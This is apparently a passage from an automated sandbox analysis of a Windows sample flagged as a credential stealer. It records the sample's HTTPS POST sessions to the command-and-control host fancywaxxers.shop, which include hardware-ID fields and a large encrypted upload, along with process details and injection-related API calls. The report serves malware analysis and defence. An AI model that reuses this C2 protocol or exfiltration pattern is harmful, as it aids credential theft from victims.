name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--XF7EXX2N03UIContent-Disposition: form-data; name="pid"3--XF7EXX2N03UIContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--XF7EXX2N03UI
2025-01-01 21:05:02 UTC	4596	OUT	Data Raw: 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2025-01-01 21:05:02 UTC	1139	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:05:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f84amf5osmgnke56bv18vedsst; expires=Sun, 27 Apr 2025 14:51:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=flt6bDsTPkwNjIZy8JVx%2BpXz05YJqr5GJorImfJMeB3NVCE6yHo5uRtWY1qI2zA9Q1XeMVuALlTr5sk%2B%2FZrwxWxENLwxujaNLGSGpypa09cYh%2BiwJNcq%2Flqvjx%2FmDFzWmblV4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb577153c4b1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1590&rtt_var=607&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20884&delivery_rate=1784841&cwnd=153&unsent_bytes=0&cid=255c8a926915fb4d&ts=586&x=0"
2025-01-01 21:05:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 21:05:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49718	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:05:04 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WZ9VX7QJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1185 Host: fancywaxxers.shop
2025-01-01 21:05:04 UTC	1185	OUT	Data Raw: 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --WZ9VX7QJContent-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--WZ9VX7QJContent-Disposition: form-data; name="pid"1--WZ9VX7QJContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--WZ9VX7QJContent-Disposit
2025-01-01 21:05:04 UTC	1132	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h4pt8usqr3b6ka3j0loajhpagi; expires=Sun, 27 Apr 2025 14:51:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thb%2B0Gg36dCQyd1aajaZJvnr%2BlvxaxDQLsI10ijFF7ZkP8DVYG3elnBe4FmFllNQ%2B5iyR1lr5Nagf3TOJf%2BtIOv52ybKgHoFcfdSORwwfxQi4dSUvCf7kLliNkqATuSyyXlWbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb57723782e8cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=1899&rtt_var=824&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2093&delivery_rate=1537651&cwnd=242&unsent_bytes=0&cid=39af8739cf7e0028&ts=442&x=0"
2025-01-01 21:05:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 21:05:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49720	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:05:05 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KCJP2GIMZMWW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587484 Host: fancywaxxers.shop
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a Data Ascii: --KCJP2GIMZMWWContent-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--KCJP2GIMZMWWContent-Disposition: form-data; name="pid"1--KCJP2GIMZMWWContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--KCJP2GIMZMWW
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: 09 2a 83 81 36 58 38 ac d5 2f 57 01 90 4a bc ab 96 e7 3b 07 e2 be 70 ef a6 fb df b1 3e f2 10 d0 6a 77 bf 8c 13 95 9b a1 9d 60 df 99 40 ff 41 dd 17 9c 24 a0 a2 84 d6 96 ff 37 f0 2d 92 7f f1 82 7d b8 b2 23 51 50 b6 0b 70 f5 39 08 76 3a e7 3c 6a 38 51 ac cb 25 ba fa 93 72 f1 9b f1 66 c6 b2 51 22 a9 cc 0f 79 b6 b7 44 3b f6 a6 6b ef 46 e6 62 41 5a 9c 91 12 3a 0f d5 be 55 34 e5 d5 c5 d3 59 ed a5 fe fc 7f 86 e5 ff 16 63 5e 00 5a fd 8e e0 3e 1a d4 93 c9 3d be 08 18 c6 c1 1c 34 69 fb 94 c0 a0 22 e3 c5 9e 94 62 0e 88 f5 8f 8c fe cb 63 0c 16 5a 46 f9 66 3a c2 89 b9 9c 71 e0 53 53 5b 96 3a 1a 1e 5b a3 e7 a7 42 b5 8f be 1d 1e 04 3c c2 d4 d4 47 ec 7e d1 9c 92 dd ab ad 0c e3 eb 32 ae f8 db 5c 5a ca 2c b8 e6 6e 76 d8 df 9b 0e c2 f4 15 31 93 d4 e4 37 dc f1 77 a8 51 33 96 Data Ascii: *6X8/WJ;p>jw`@A$7-}#QPp9v:<j8Q%rfQ"yD;kFbAZ:U4Yc^Z>=4i"bcZFf:qSS[:[B<G~2\Z,nv17wQ3
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: c4 8c 68 be 1a fa 53 42 cc 5c 65 ee 1e de fa 07 62 42 d1 10 d5 20 ac ed 90 82 d0 7f 4d d4 23 66 e6 1a 63 d9 08 59 e7 a1 c0 65 94 61 1f 43 ee e9 17 c8 48 38 56 1f c1 81 f6 c4 a5 2a 6d 98 91 4d 81 63 c2 83 55 4b 31 0c e6 6d c7 4c e1 4f 39 1c b7 cb 2b 53 c5 fd 92 64 a6 d7 7c e3 90 37 71 ca d9 d9 7c 24 d5 65 4a 29 62 bb df 88 97 93 73 f5 4a 21 72 bb b8 f2 50 a4 93 0e 8c 91 c1 05 07 4c 3c 12 f4 94 9f 4e c4 37 fe 4d 32 aa 1a 94 8d 7f e6 2f 8f 48 41 a6 f4 35 1b 7a b7 50 2f 3f c8 3c 7e 03 55 9f 9a d2 45 af 9c bf f4 65 66 f5 d4 e0 a6 e6 ee 8f 21 8f 8e 33 f3 f5 12 77 3d 2a 77 87 16 86 9a af ac fb 88 16 21 39 30 61 d2 eb db 75 b5 41 31 c7 e4 5f d1 da e3 a2 71 d6 8b 41 61 44 27 bd 78 1f 05 ac 87 f9 0d b0 f8 78 7d 34 fb 0d 00 57 db 5e b8 3b 3e fe bf 72 11 6e 45 1c d3 Data Ascii: hSB\ebB M#fcYeaCH8VmMcUK1mLO9+Sd\|7q\|$eJ)bsJ!rPL<N7M2/HA5zP/?<~UEef!3w=w!90auA1_qAaD'xx}4W^;>rnE
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: da 24 98 fa fc f2 81 57 bc 52 a8 e6 de c5 67 cf 86 9f f6 14 76 fd 6b ae 88 17 12 0b 71 7a 53 b9 b9 76 ea 48 f4 0b 52 f3 4a d4 b1 53 dc 6f 3c c7 93 27 31 18 00 fd 01 60 3f ed 8a af 49 9d 97 03 55 d2 64 7a b3 8f 05 8c 2f 42 79 1e 17 e9 fc bb fe 6d 28 f0 1b 12 26 fe 99 3f 6e 14 2e a3 54 72 e4 8f 0f cf 26 d9 3f cd 74 03 ea e9 56 01 75 7b ba 44 35 66 b2 56 50 76 ac 4e 9d 6f 06 c0 2e de 1d 0d ab b8 06 23 e1 ab f3 ca 07 4f 72 24 fa d0 ef 5b 7f ee 3e 7d 16 6c 3d f7 dc a0 8f 8b 76 ab 6d 36 77 de 3b 39 10 be a5 75 8c e5 d2 57 fc c8 89 aa a8 3c 17 73 21 88 8b 7c ef df 1f 41 93 e5 18 10 71 83 05 66 04 b9 36 20 df e6 ef e6 7e 29 10 cd 9b 6e c7 81 08 1a 82 48 99 1e 08 4d 34 45 69 4a 15 c6 96 6f b6 ee cb f0 d0 4f 02 e1 a8 55 95 27 0c cb 25 b3 76 69 af b3 e2 6c 00 c3 e5 Data Ascii: $WRgvkqzSvHRJSo<'1`?IUdz/Bym(&?n.Tr&?tVu{D5fVPvNo.#Or$[>}l=vm6w;9uW<s!\|Aqf6 ~)nHM4EiJoOU'%vil
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: 48 af aa a1 d6 02 d8 6f 81 d9 7a 4e df 2c 04 31 84 80 61 56 6d 3d 60 01 77 51 25 8d db dd 9c e0 0b 5c db 69 a6 48 37 58 13 1b 84 b3 ff 5d 5d d5 a6 13 d1 d2 a7 dc c7 d1 ec 8f c1 b4 3f 88 c3 d5 b5 4f 0c 55 f4 e4 c9 6d 62 1f e3 7f a5 7e 6b bd 8a 21 61 c1 67 8e ba 17 fe 6d fb 86 e6 11 32 10 be 5b 00 65 e9 08 7f 82 7a 9c b4 92 b2 1e 37 b6 6d 7c 8d 76 3d 45 04 ba 3d 67 36 46 43 05 a0 bc 66 16 da 8b 3e 24 1e c7 ba 39 0d 84 b0 b1 ad 6b 59 85 4f e3 0e 35 5f 11 4a 7f 52 40 0a d1 ab d1 d3 ab fe e0 a8 f3 af 3b 0c 90 f2 f5 aa 2a ea ed 5c d9 8f 88 dd cc 49 a4 99 8a 53 8a e7 42 73 09 29 3c 59 ca 50 60 af 61 cb 1c 91 a8 41 d4 3c 43 91 42 68 c5 ec f6 f1 e2 5c 21 96 33 37 07 cc 20 fc e2 c8 56 a8 1a 06 b7 64 92 01 3b 5e 47 86 ee 0c f6 66 87 d0 6c c0 fb 5d 85 e0 e0 a8 c0 b0 Data Ascii: HozN,1aVm=`wQ%\iH7X]]?OUmb~k!agm2[ez7m\|v=E=g6FCf>$9kYO5_JR@;*\ISBs)<YP`aA<CBh\!37 Vd;^Gfl]
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: 1f 56 5b ff 6b 7b c3 15 f3 56 c5 3a 9b 9e f5 2b a2 fb cc e4 90 f6 43 23 7d 0d cd df 1f 8b 70 49 b8 d6 e3 82 57 24 9c 73 4f 46 be a7 fb f1 dd 96 d1 1c ab 12 c7 5e 06 6e 83 54 55 a1 a7 eb 6f 1a b2 95 1e 92 7f 9a d1 96 52 9f 1e 88 75 5b cc 60 bf 95 01 ac d3 ad 74 d9 ac e1 51 2b ce 84 5b 97 6b 8b 3f d3 6e 46 08 84 aa f1 03 7d 1f e2 43 08 f8 5d e6 12 8b b9 07 08 0f d6 d3 82 ae 17 2f 50 58 69 6e 0b fb 0e 98 67 0b 6d eb f4 15 a9 3c 3d c8 33 f7 00 ea 9a 4c 37 6c 7f f2 63 26 7b ee 8a 63 42 69 25 f7 52 b1 7f 87 4c fb 64 8b 7f 14 71 71 c4 f6 b8 9c 38 f0 6e 35 15 d2 0b e2 c5 94 2d 50 38 39 69 ad 48 76 4b 0f 7b e1 51 54 d0 2f dd b0 00 b2 d3 a7 5d 8d 31 22 a0 59 3c 42 35 80 12 06 36 f1 44 02 9d 40 25 8a 31 67 56 44 24 ed 9e 7a 5e ab dd a7 5e 73 c7 f2 04 4e 2d 5d db 0a Data Ascii: V[k{V:+C#}pIW$sOF^nTUoRu[`tQ+[k?nF}C]/PXingm<=3L7lc&{cBi%RLdqq8n5-P89iHvK{QT/]1"Y<B56D@%1gVD$z^^sN-]
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: 07 bc 13 3f b0 ab be 10 9a 73 11 62 88 72 9e c6 16 a8 2c 25 4d 7a 61 10 e3 10 fd 4b 6e 01 9a 5a 21 7f 17 71 19 b8 c9 85 8a 83 cb b9 39 85 6d 2d 98 eb b4 d8 0a b4 e7 e9 94 76 07 fd 05 ab b1 aa c8 7b d3 d8 4e 29 aa b4 f0 7e d1 df 7d c5 2c 57 fc ba bb 62 26 82 48 34 3c 84 42 40 5b bd 3c 79 00 87 60 67 1f c5 0a e0 83 50 9c 50 38 be d4 53 2f c6 6f 9e 25 04 fa d7 ef ca 55 ab c6 6e 61 78 c4 64 c5 ff 4b 0e 6b 0c 49 e5 6f 94 a2 96 fe ea d1 83 f8 f8 de 08 88 8a da 66 a8 6d 33 60 f9 00 c4 b0 d1 2f 6a de 62 a5 fd c6 fc fd 99 87 87 9a ca 0a c4 69 ca 6c 17 83 14 2d 08 da ee 14 3e 09 74 fe d4 fd 91 67 1f 84 8d fc 46 ff a8 48 40 a5 fa 94 be 34 cd 08 fe 63 c8 50 80 dd f2 63 3f dd 5d b7 21 ac c8 ba f3 19 67 45 ca 6b fd 8c f0 6a d4 b8 e1 50 e7 ce f5 03 13 dd 2f bb 1f 70 6a Data Ascii: ?sbr,%MzaKnZ!q9m-v{N)~},Wb&H4<B@[<y`gPP8S/o%UnaxdKkIofm3`/jbil->tgFH@4cPc?]!gEkjP/pj
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: 66 fe 81 38 7f 52 09 6b f1 1e d7 2c 75 f5 38 2d a6 57 72 64 e0 c5 59 ba f7 09 c6 f5 41 41 6d 4a 40 d4 be 16 da 4a ce c6 00 b6 a0 59 07 01 b3 06 66 04 48 0c 7e b6 32 d6 fe ce af e3 fb de e6 94 7e f2 67 4f 35 0c a7 e4 97 5f 9b e3 5e 25 7e 2a ff 7b 7b cd 52 e1 e2 bd da d8 5e a1 f5 e2 70 36 0b be 9b 68 44 bd 74 d0 7a e9 38 06 d5 30 12 bf 7a b8 8a fe 81 66 06 48 73 12 28 b5 65 97 85 7b a3 39 e0 dc 90 2e 6b f9 6a f5 fb 39 a9 4c c8 70 ae 98 ae b4 e8 82 83 fd 8f 35 2c de 7b bf 1e 06 5b b5 cd 51 1b d6 35 4a e7 65 8a f9 26 9c f5 14 5e 11 38 b1 e6 13 75 25 f3 e2 f0 f1 f5 4f 4a 60 56 66 69 38 ba e5 85 8c 8f 80 f9 69 94 4b 0d 3d 9e 3b 1c 71 f6 a5 e6 70 b5 3a e8 9a f3 d8 50 af 9f a0 1a fc 48 71 de 15 df fd 6c 2e 9d ae 90 f7 99 56 37 29 84 89 5e 0e 29 a2 47 ad 90 40 7c Data Ascii: f8Rk,u8-WrdYAAmJ@JYfH~2~gO5_^%~*{{R^p6hDtz80zfHs(e{9.kj9Lp5,{[Q5Je&^8u%OJ`Vfi8iK=;qp:PHql.V7)^)G@\|
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: ef fe 8b a4 96 67 be 0c cd 21 0e 7e 06 67 78 77 43 45 5a 6d 2c 88 a4 2a 1b 5c 6d 70 a3 b9 5b 1c 0b 09 fe de d2 ab 78 c5 f0 eb 47 15 6a 36 d7 a1 ed ee 6c 78 6d e4 c6 97 ad 8e 23 d6 40 eb 01 ac 30 0f b1 7f 88 8d 3c fb 43 56 1f fd 12 9f a9 df a4 08 a6 4e 8a 00 c2 79 99 34 1b 14 4c 41 23 44 22 71 2c 8d f1 cf c1 9f 26 ed ab 9b 3a 0b 99 19 46 c8 90 77 15 fb 50 81 36 58 74 5b ab 19 2d 29 be 4e 4c be 38 6e bc 5b b1 ad 50 ba b9 f2 80 27 87 79 3c 9c 7d 7c bb c8 70 cd e8 75 a2 b4 b2 b0 4b 61 62 04 fa 76 82 9b 2e e9 0c aa b7 52 32 50 f6 aa 39 4f f4 2f 9b dc 70 d0 67 46 4d 5b 7f 72 ba 69 6a 47 31 22 6d 9f 7d 90 3a ed f8 ac c3 03 07 1c 90 15 d6 f3 6e 5a 3a f0 94 be 9c 34 15 08 7e 6e 62 47 91 ad 97 fe 6e ae 45 74 bf a8 1b a5 3e 86 98 ed c9 05 06 dc ce c9 03 a8 b5 24 4a Data Ascii: g!~gxwCEZm,*\mp[xGj6lxm#@0<CVNy4LA#D"q,&:FwP6Xt[-)NL8n[P'y<}\|puKabv.R2P9O/pgFM[rijG1"m}:nZ:4~nbGnEt>$J
2025-01-01 21:05:05 UTC	15331	OUT	Data Raw: 01 d7 ca c3 80 36 57 c6 09 b5 2d 71 5d 71 b0 34 a4 65 15 8c 36 0d d4 91 d6 99 48 21 89 94 a0 d9 02 d6 fd a3 1d 23 9c 3f dd 09 fa c8 e2 a9 76 b1 e7 11 5a 00 9a a8 46 b2 85 41 ff 7c e5 94 11 8a 95 63 f3 7d 0d fa bf dc 0c 05 b8 a1 58 60 6f 0b 94 1a 15 aa 52 df ff 42 39 35 4e b0 5c 6f ea 31 57 c9 fd 30 30 99 7a 8c 56 da 05 f6 7e 6c 08 ed 50 cd 84 50 81 92 f9 5c ce 6e 6c 2a 3b 54 39 2b 9d 83 94 59 3a b4 a1 f4 68 1f df a0 e0 7e 17 cc e9 1f 1b 61 6a 1b a2 fe 5e cc 9f 02 82 e4 21 83 02 52 4f 42 a5 5c fe fb 44 89 71 57 ec c5 f1 0a b7 bf ef 34 3e 54 cd 0f 4a 15 53 9b e4 07 12 2d 41 62 18 dc a3 0f 64 19 41 bb 35 c1 c9 e3 ca a5 17 28 f1 5b a2 ab ef 5c 70 dc 31 3b d8 4f 89 d4 a7 33 1e 01 72 16 2f a8 3d 44 f9 fb d8 3b 9a ab d7 86 82 df 02 cb 31 80 e8 ed aa f5 fa 57 99 Data Ascii: 6W-q]q4e6H!#?vZFA\|c}X`oRB95N\o1W00zV~lPP\nl*;T9+Y:h~aj^!ROB\DqW4>TJS-AbdA5([\p1;O3r/=D;1W
2025-01-01 21:05:07 UTC	1139	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=htqkcojb10bfauqdiu791vi2sq; expires=Sun, 27 Apr 2025 14:51:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Ydw226eJvmgoHB6hXICJtjIg9NN%2BkmfseCZ%2FgkjWYOj6XTtg3j1Ecn5CqrRC2sczfI81iR7Yv%2FhWZm0HrlUDzPIliKgsSmkWoPiMtIBdo6Fv4FGVVT%2BlaCvtAAruYn10RdjEw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb5772c3c368cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1823&rtt_var=697&sent=318&recv=601&lost=0&retrans=0&sent_bytes=2844&recv_bytes=590070&delivery_rate=1555673&cwnd=242&unsent_bytes=0&cid=a504194b56be4be1&ts=1703&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49736	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:05:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: fancywaxxers.shop
2025-01-01 21:05:08 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 26 6a 3d 26 68 77 69 64 3d 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 Data Ascii: act=get_message&ver=4.0&lid=Zv86PG--UzeRR&j=&hwid=6EEC98F5FCD4F9CB20A4C476FD51BCB1
2025-01-01 21:05:08 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:05:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o1ujqok2ihddgge296gjn67etu; expires=Sun, 27 Apr 2025 14:51:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGgvJAKbHTs851fefsBFBvk9FGJ%2FmOHFu%2BS63N3eopVcVB3mJnauBLrkuqNRRCXosq%2BfvT5f2oXmoTehcxDm0JLrh5YY%2FL8gWhG2k3V5HdQrEb0vkC241PL4r20E6EazlU963w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb57739cc6241a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1615&rtt_var=616&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=983&delivery_rate=1762220&cwnd=239&unsent_bytes=0&cid=e2114b75676f7d3b&ts=476&x=0"
2025-01-01 21:05:08 UTC	54	IN	Data Raw: 33 30 0d 0a 31 4e 47 6c 56 33 63 59 4e 63 32 41 2b 32 63 68 67 6e 4b 6a 2f 78 41 5a 55 76 32 7a 45 37 5a 75 48 62 42 65 49 69 7a 50 58 41 57 50 6a 41 3d 3d 0d 0a Data Ascii: 301NGlV3cYNc2A+2chgnKj/xAZUv2zE7ZuHbBeIizPXAWPjA==
2025-01-01 21:05:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:04:55
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\UhsjR3ZFTD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UhsjR3ZFTD.exe"
Imagebase:	0x6c0000
File size:	835'112 bytes
MD5 hash:	51648584FFB4A6398EB1CEF4DA20E457
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:04:55
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:04:55
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\UhsjR3ZFTD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UhsjR3ZFTD.exe"
Imagebase:	0x6c0000
File size:	835'112 bytes
MD5 hash:	51648584FFB4A6398EB1CEF4DA20E457
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2181607562.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2181670779.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	33

Executed Functions

Function 006F019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,006F0110,006F0100), ref: 006F0334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 006F0347
